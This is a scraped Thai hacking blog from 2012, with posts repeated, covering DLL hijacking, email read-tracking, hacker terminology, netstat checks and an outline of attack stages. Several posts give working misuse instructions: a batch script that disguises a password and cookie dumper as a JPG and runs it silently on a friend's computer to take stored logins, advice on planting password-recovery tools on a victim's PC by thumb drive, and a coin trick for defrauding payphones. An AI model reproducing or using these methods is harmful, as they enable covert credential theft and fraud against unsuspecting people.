ปล.กำลังลบขยะในคอมดันเห็นตั้งอยู่นึกว่าหายไปละเลยเอามาให้ลองเล่นกัน
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
มีความรู้ด้าน DOS พอสมควร เพราะเกมนี้ต้องใช้คำสั่ง DOS ในการเล่นครับ สำหรับคนที่ไม่มีพื้นฐาน
ก็เล่นได้นะแต่อาจจะงงสักหน่อย พิมพ์ อาจไปหัดเล่นเกม Hacker Evolution แล้วค่อยมาเล่นเกมนี้ก็ได้ครับ
รูปร่างหน้าตาเกมก็เป็นประมาณนี้ครับ
ปล.กำลังลบขยะในคอมดันเห็นตั้งอยู่นึกว่าหายไปละเลยเอามาให้ลองเล่นกัน
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
วันพฤหัสบดีที่ 15 มีนาคม พ.ศ. 2555
DLL Hijacking สอดไส้โค๊ดร้ายลง DLL แอนติหาไม่พบ !?
DLL Hijacking ไทยเวอร์ชั่น
เขียนโดย Pe3z
ผมขอออกตัวตามสเต็ปก่อนเลยนะครับว่า ผมไม่ได้เก่งกาจอะไร แค่อัพเดทข่าวของเขาแล้วมาแปลเท่านั้นเองครับ ตกหล่นอะไรก็สามารถคอมเม้นบอกกันได้ทันทีนะครับ
สำหรับเรื่องที่จะมาบล๊อกวันนี้คือ DLL Hijacking ซึ่งเป็นช่องโหว่การโจมตีแบบใหม่ครับ ค้นพบโดย HD Moore http://digitaloffense.net/ ซึ่งเป็นหนึ่งใน Developers ของ Metaspolit และอีกหลายโปรแกรมดัง ๆ ครับ
โดย DLL Hijacking ใช้หลักการคือ การสร้าง DLL Files โดยแทรกคำสั่งอันตรายเข้าไป ซึ่งโดยปกติแล้ว โปรแกรมทั่วไปมักจะใช้ DLL ในการรวมเข้ามาทำงาน เพื่อให้โปรแกรมสามารถทำงานได้อย่างสมบูรณ์ ดังนั้นจึงมีความเสี่ยงสูงในทุก ๆ โปรแกรมที่ใช้ DLL Files อาจโดนสอดไส้คำสั่งได้
วิธีหลักของการ DLL Hijacking ยังคงใช้แนวเดิมกับโทรจันอยู่ โดยจะทำการอัพโหลด DLL Files และจูงใจให้เหยื่อมีการดาวโหลด และเรียกใช้งาน และนับเป็นการยากที่จะป้องกัน ถึงแม้โปรแกรมป้องกันในประเภทแอนติไวรัส ก็คงยังไม่สามารถป้องกันได้ในเร็ว ๆ นี้ เนื่องจากตัวโครงสร้าง DLL Files ของแต่ละโปรแกรมแตกต่างกัน ทำให้ตัวแอนติไวรัส ยังไม่สามารถระบุเจาะจงไปยังเป้าหมายได้
การสร้าง Malicious DLL Files สามารถทำได้โดยผ่าน Metaspolit Framework โดยทาง Metaspolit ได้มีชุดคำสั่งเตรียมเอาไว้แล้วในการ hijack เข้าไปในโปรแกรมต่าง ๆ
SBKElshsvlk
สุดท้ายเพียงแค่ส่งให้เหยื่อคลิก เราก็สามารถควบคุมผ่าน console ได้ทันทีครับ
การป้องกันเบื้องต้นคือการไม่คลิกลิ้งค์ต่าง ๆ ที่ตัวเองไม่ได้สั่งมา ลิ้งค์แปลก ๆ ที่เกิดขึ้นโดยไม่รู้สาเหตุครับผม
เขียนโดย Pe3z
ผมขอออกตัวตามสเต็ปก่อนเลยนะครับว่า ผมไม่ได้เก่งกาจอะไร แค่อัพเดทข่าวของเขาแล้วมาแปลเท่านั้นเองครับ ตกหล่นอะไรก็สามารถคอมเม้นบอกกันได้ทันทีนะครับ
สำหรับเรื่องที่จะมาบล๊อกวันนี้คือ DLL Hijacking ซึ่งเป็นช่องโหว่การโจมตีแบบใหม่ครับ ค้นพบโดย HD Moore http://digitaloffense.net/ ซึ่งเป็นหนึ่งใน Developers ของ Metaspolit และอีกหลายโปรแกรมดัง ๆ ครับ
โดย DLL Hijacking ใช้หลักการคือ การสร้าง DLL Files โดยแทรกคำสั่งอันตรายเข้าไป ซึ่งโดยปกติแล้ว โปรแกรมทั่วไปมักจะใช้ DLL ในการรวมเข้ามาทำงาน เพื่อให้โปรแกรมสามารถทำงานได้อย่างสมบูรณ์ ดังนั้นจึงมีความเสี่ยงสูงในทุก ๆ โปรแกรมที่ใช้ DLL Files อาจโดนสอดไส้คำสั่งได้
วิธีหลักของการ DLL Hijacking ยังคงใช้แนวเดิมกับโทรจันอยู่ โดยจะทำการอัพโหลด DLL Files และจูงใจให้เหยื่อมีการดาวโหลด และเรียกใช้งาน และนับเป็นการยากที่จะป้องกัน ถึงแม้โปรแกรมป้องกันในประเภทแอนติไวรัส ก็คงยังไม่สามารถป้องกันได้ในเร็ว ๆ นี้ เนื่องจากตัวโครงสร้าง DLL Files ของแต่ละโปรแกรมแตกต่างกัน ทำให้ตัวแอนติไวรัส ยังไม่สามารถระบุเจาะจงไปยังเป้าหมายได้
การสร้าง Malicious DLL Files สามารถทำได้โดยผ่าน Metaspolit Framework โดยทาง Metaspolit ได้มีชุดคำสั่งเตรียมเอาไว้แล้วในการ hijack เข้าไปในโปรแกรมต่าง ๆ
SBKElshsvlk
สุดท้ายเพียงแค่ส่งให้เหยื่อคลิก เราก็สามารถควบคุมผ่าน console ได้ทันทีครับ
การป้องกันเบื้องต้นคือการไม่คลิกลิ้งค์ต่าง ๆ ที่ตัวเองไม่ได้สั่งมา ลิ้งค์แปลก ๆ ที่เกิดขึ้นโดยไม่รู้สาเหตุครับผม
วันพุธที่ 14 มีนาคม พ.ศ. 2555
การสะกดรอยและทำลายอีเมล์
การสะกดรอยและทำลายอีเมล์
อยากรู้มะว่าอีเมลที่เราใช้กันเนี้ยไปถึงผู้รับไหม
แล้วมันได้อ่านหรือยัง
ตอนนี้มีวิธีตอบสอบให้แล้วนะครับไม่ยาก
โดยทำตามขั้นตอนต่อไปนี้
1.เข้าไปที่เว็บไซต์ www.readnotify.com
2.ที่ช่องYour existing email addressให้ใส่ชื่ออีเมลเราลงไป
3.คลิกปุ่มGo
4.ใส่อีเมลเราอีกทีที่ช่องMain EMAIL
5.ตั้งpasswordใหม่อีกที
6.กรอกข้อมูลส่วนตัวให้ครบพร้อมคำถามฉุกเฉินลงไป
7.คลิกเลือกช่องTerms and Corditions
8.คลิกปุ่มSign Up
9.จะปรากฏข้อความWelcome to Readnotify
10.ต่อจากนั้นเวลาส่งเมล์ถ้าเราอยากรู้ว่าเขาอ่านเมล์ยังให้พิมพ์ .readnotify.com ต่อท้ายลงไป
เช่น buffalo@hotmail.com.readnotify.com
11.ตรวจสอบปลายทางโดยเข้าไปที่เว็บไซต์www.readnotify.comอีกทีนึง
12.ล็อกอินเข้าไปโดยใช้ชื่อเรา
13.readnotifyจะรายงานผลให้ทราบว่าได้อ่านยังโดย
14.ดูช่องสถานะOpendd
15.not yet ยังไม่ได้อ่าน Openedอ่านแล้ว
16.อันนี้เด็ดที่สุดถ้าต้องการให้ทำลายอีเมลที่ส่งไป
ภายใน60วิหลังจากอ่าน(คนอ่านคงงงน่าดู)โดย
17.ให้เพิมพ์ .selfdestructing ต่อท้ายเช่น
buffalo@hotmail.com.selfdestructing.readnotify.com
ปล.การสอนนี้เพื่อการศึกษาเท่านั้นไม่ได้มีเจตนาร้ายใดใด้ทั้งสิ้น
by visor แห่ง Zc Club
ข้อมูลจาก ruk-com.in.th
อยากรู้มะว่าอีเมลที่เราใช้กันเนี้ยไปถึงผู้รับไหม
แล้วมันได้อ่านหรือยัง
ตอนนี้มีวิธีตอบสอบให้แล้วนะครับไม่ยาก
โดยทำตามขั้นตอนต่อไปนี้
1.เข้าไปที่เว็บไซต์ www.readnotify.com
2.ที่ช่องYour existing email addressให้ใส่ชื่ออีเมลเราลงไป
3.คลิกปุ่มGo
4.ใส่อีเมลเราอีกทีที่ช่องMain EMAIL
5.ตั้งpasswordใหม่อีกที
6.กรอกข้อมูลส่วนตัวให้ครบพร้อมคำถามฉุกเฉินลงไป
7.คลิกเลือกช่องTerms and Corditions
8.คลิกปุ่มSign Up
9.จะปรากฏข้อความWelcome to Readnotify
10.ต่อจากนั้นเวลาส่งเมล์ถ้าเราอยากรู้ว่าเขาอ่านเมล์ยังให้พิมพ์ .readnotify.com ต่อท้ายลงไป
เช่น buffalo@hotmail.com.readnotify.com
11.ตรวจสอบปลายทางโดยเข้าไปที่เว็บไซต์www.readnotify.comอีกทีนึง
12.ล็อกอินเข้าไปโดยใช้ชื่อเรา
13.readnotifyจะรายงานผลให้ทราบว่าได้อ่านยังโดย
14.ดูช่องสถานะOpendd
15.not yet ยังไม่ได้อ่าน Openedอ่านแล้ว
16.อันนี้เด็ดที่สุดถ้าต้องการให้ทำลายอีเมลที่ส่งไป
ภายใน60วิหลังจากอ่าน(คนอ่านคงงงน่าดู)โดย
17.ให้เพิมพ์ .selfdestructing ต่อท้ายเช่น
buffalo@hotmail.com.selfdestructing.readnotify.com
ปล.การสอนนี้เพื่อการศึกษาเท่านั้นไม่ได้มีเจตนาร้ายใดใด้ทั้งสิ้น
by visor แห่ง Zc Club
ข้อมูลจาก ruk-com.in.th
มาเลือกทางเดินกันก่อนครับ
Hacker กับหมวกสองใบที่ต้องเลือก
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
วันเสาร์ที่ 10 มีนาคม พ.ศ. 2555
ตำนาน Hacker (เผื่อคนม่ะรู้นะคับ)
8) 8) 8)
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ก่อนตั้งคำถาม!!!!!
ก่อนถามปัญหาทางเทคนิคผ่านทาง shout box หรือใน webboard หรือ ใน ห้องchat แนะให้ทำสิ่งต่อไปนี้ก่อน
1. หาคำตอบจากกระทู้ในบอร์ดนั้นๆก่อน
2. ไปค้นในเว็บทั่วไปเสียก่อน
3. พยายามอ่าน กฏ หรืออะไรก็ตามที่เขาแนะนำให้อ่าน
4. ไปหาอ่านใน FAQ (ปัญหาที่เจอบ่อย)
5. ลองตรวจดู หรือ ทำการทดลองเองก่อน
6. หากคุณเป็น programmer ลองพยายามศึกษา source code เองดูก่อน
7. กลับไปอ่านข้อ 1 ใหม่
ระหว่างการถามคำถาม ให้แสดงว่าคุณได้พยายามทำด้วยตัวเองแล้ว เพราะมันจะช่วยให้คุณไม่ใช่ตัวขี้เกียจที่รอแต่คนมาป้อนให้และไม่เป็นการเสียเวลาสำห
รับ ผู้ที่จะช่วยให้คำตอบคุณ จะให้ดีกว่านั้น คุณควรนำเสนอสิ่งที่คุณได้ ศึกษา มาก่อนหน้านี้ เพราะเราชอบจะตอบคำถามกับคนที่แสดงให้เห็นว่าพวกเขาสามารถเรียนรู้จากคำตอบ ได้
วันศุกร์ที่ 9 มีนาคม พ.ศ. 2555
Hack&Programing&Virus&Tip esn....
อันนี้คือแทบหมดหัวเลย :( :(
Hack
การแฮกผ่าน Thum Drive :o
บทนี้จะเป็ฯการแฮกผ่าน thum drive หรือ แฮกโดยติดตั่งโปรแกรามลงเรื่องเหยื่อ (ได้ผมระยะยาว) เหมากับมือใหม่หัดแฮค
โปรแกรมที่แนะนำต่อไปนี้มี MessenPass แกะรหัสผ่าน ของ Msn Yahoo ICQ เป็นต้น
Mail Pass view แกะรหัสผ่านของเว็บเบสอย่าง Hotmail Yahoo และโปรแกรม outlook Express
Protected Stprage Pass view แกะรหัสที่เก็บไว้ในเครื่อง PC เช่น Msn Express เป็นต้น
Dialupass แกะรหัส ของ Dial-up,RAS,VPN
จากที่ตรวจดูแล้ว โปรแกรมเหล่านี้ไม่ใช่ spyware หรือ Trojan แต่ก้ยังหวั่นเพราะ โปรแกรมพวกนี้แจกฟรี ต้องเสี่ยงใช้งานเอง ไม่รับผิดชอบเมื่อมีปัญหาเกิดขึ้น
ปัญหาที่1 ??? เราจะลงเข้าเครื่องเจ้าบอยตรงๆได้เรื่องแน่ เพราะ วินโดว์ของโปรแกรมแสดงออกมา เมื่อเข้าไปอ่านรายละเอียดพบว่าทั่ง4โปรแปรมแกรม สามารถเรียกผ่าน คอมมานไลด์ได้ ซึ่งการรันลักษณะนี้วินโดว์จะไม่แสดงออกมา
Hack
การแฮกผ่าน Thum Drive :o
บทนี้จะเป็ฯการแฮกผ่าน thum drive หรือ แฮกโดยติดตั่งโปรแกรามลงเรื่องเหยื่อ (ได้ผมระยะยาว) เหมากับมือใหม่หัดแฮค
โปรแกรมที่แนะนำต่อไปนี้มี MessenPass แกะรหัสผ่าน ของ Msn Yahoo ICQ เป็นต้น
Mail Pass view แกะรหัสผ่านของเว็บเบสอย่าง Hotmail Yahoo และโปรแกรม outlook Express
Protected Stprage Pass view แกะรหัสที่เก็บไว้ในเครื่อง PC เช่น Msn Express เป็นต้น
Dialupass แกะรหัส ของ Dial-up,RAS,VPN
จากที่ตรวจดูแล้ว โปรแกรมเหล่านี้ไม่ใช่ spyware หรือ Trojan แต่ก้ยังหวั่นเพราะ โปรแกรมพวกนี้แจกฟรี ต้องเสี่ยงใช้งานเอง ไม่รับผิดชอบเมื่อมีปัญหาเกิดขึ้น
ปัญหาที่1 ??? เราจะลงเข้าเครื่องเจ้าบอยตรงๆได้เรื่องแน่ เพราะ วินโดว์ของโปรแกรมแสดงออกมา เมื่อเข้าไปอ่านรายละเอียดพบว่าทั่ง4โปรแปรมแกรม สามารถเรียกผ่าน คอมมานไลด์ได้ ซึ่งการรันลักษณะนี้วินโดว์จะไม่แสดงออกมา
การโกงเครื่องโทรศัทพ์ตู้ จากคุณ อย่างเทพ
บทความยังเป็นเรื่องเกี่ยวกับโทรศัพท์สาธารณะอยู่ ฮุฮุ แต่ว่าอันนี้ยังใช้ได้แน่นอน
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
เอ.............. เราเล่น net เพลินๆอยู่นี่มีใครแอบเข้ามาหาเราหรือเปล่าน้อ
** Google แอบย่องมาเก็บข้อความในเครื่องเราไปโชว์ทั่วโลกบ้างมั้ยนี่
** แล้วพวกโฆษณา แฝงเข้ามาบ้างไหม อื่ม... เรามี Anti spyware แล้วนี่
** มีบรรดา hacker มาเยี่ยมบ้างไหม
เอางี้ มาดูวิธีแอบดูว่าใครหรือมีอะไรมาแวะหาเราบ้าง
ในขณะที่สมาชิกกำลังใช้งาน internet อยู่ (ไม่ว่าจะเป็น www, FTP, ตรวจสอบ mail ด้วย POP3/SMTP โดยผ่าน protocal TCP/IP)
ท่านรู้มั้ยว่ามีใคร connected มายังเครื่องคอมฯของท่านบ้าง (มีพวก Hacker มาป้วนเปี้ยนหรือเปล่า) และก็อยากทราบหรือไม่ว่ามาจากไหน
ไม่ยากครับที่จะตรวจสอบ เพียงทำตามขั้นตอน ข้างล่างนี้...
++ เริ่มที่ ตัว Start ให้ท่าน คลิกที่ Start ---> Run
++ ที่ Run พิมพ์คำว่า netstat 10 (10 หมายถึงให้ update การ connect ใหม่ทุก ๆ 10 วินาที)
++ เสร็จแล้ว กดปุ่ม < Enter >
จากนั้น โปรแกรมจะแสดง[ ในmode dos ] ให้เห็นว่ามีใคร Connected มายังเครื่องคอมฯของท่านบ้าง พร้อมกับแจ้ง address ให้ด้วย
วิธีนี้ สามารถใช้ใน '98, Me , XP [ 2000 - ไม่มีให้ลอง เลยไม่ทราบ ใครทราบแจ้งด้วยครับ ]
### ถ้าเป็นการ run หาในเครื่องเรา ก็จะแสดงเป็น localhost ....... [ ตามด้วยหมายเลข ]
credit : http://www.zone-it.com
ข้อมูลจาก ruk-com.in.th
โปรแกรม hack password (พวกการ login)
โปรแกรมนี้ชื่อ IEpass โปรแกรมแกรม hack cookie
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
ถึงเพื่อน ๆ ที่อยากเป็น Hacker !!
โลกเราเองเกิดขึ้นมาไม่รู้กี่ร้อยกี่พันล้านปีมาแล้ว.. อันนั้นไกลเกินไป..
แต่ทุก ๆ ช่วงเวลามีการพัฒนาและมีการเปลี่ยนแปลงตลอดเวลา !!
เมื่อเราเกิดมาแล้วเราก็อยากมีส่วนร่วมในการพัฒนาประเทศชาติ !!
การ ที่เพื่อน ๆ ทุกคนอยากเป็น hacker นั้น เป็นเรื่องดี เพราะอย่างน้อยมันมีคำถามในใจว่า สิ่งนั้นมันทำอะไร มันมีหลักการอย่างไร จะทำอย่างไรที่จะใช้งานมันได้ !!
คราวนี้เมื่อพิจารณาแล้ว hacker แท้จริงต้องเป็นผู้ที่มีประสบการณ์ในเชิงคอมพิวเตอร์สูง..
ถ้า เพื่อน ๆ ใช้ Visual Basic โดยไม่เคยเขียน C/C++ เพื่อน ๆ ก็จะไม่มีทางรู้ได้ว่า ฟังก์ชั่นที่พวกเรา Call นั้นเราจะสร้างมันขึ้นมาใช้อย่างไร !!
ถ้าพวกเรารู้จัก C/C++ แต่พวกเราไม่เคยเขียน Assembly พวกเราก็ไม่รู้ว่าภาย CPU มี Instruction Sets อะไรบ้าง ? เราจะเข้าถึงส่วนสำคัญต่าง ๆ ของฮาร์ดแวร์ได้อย่างไร เช่นอ่าน Sector แรกของ DISK ต่าง ๆ เช่น HDD, FDD ได้อย่าไงไร ? // นี่แบบพื้นฐานที่สุดแล้ว //
ถ้าเราไม่รู้ ในแต่ละชั้น มันก็เกิดการพอกพูนสิ่งไม่รู้เกิดขึ้นเรื่อย ๆ !!
ดัง นั้น HACKER จึงมักเป็นผู้รู้อย่างชัดเจนในแต่ละระดับ ว่าสามารถหรือไม่สามารถทำสิ่งนี้ได้ !! เมื่อรู้ว่าไม่สามารถทำสิ่งนี้ ในระดับนี้ ต้องลงไปในระดับที่ลึกเข้าไป.. เช่น เข้าไปสู่ C/C++ แล้วจึงอิมพลิเมนต์อะไรบางอย่างออกมาเพื่อแก้ปัญหา..
Basic Hacker
พื้นฐานนะครับ บอกไว้ก่อน เดี่ยวจะหาว่าผมยังโน้นยังนี้ครับ
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
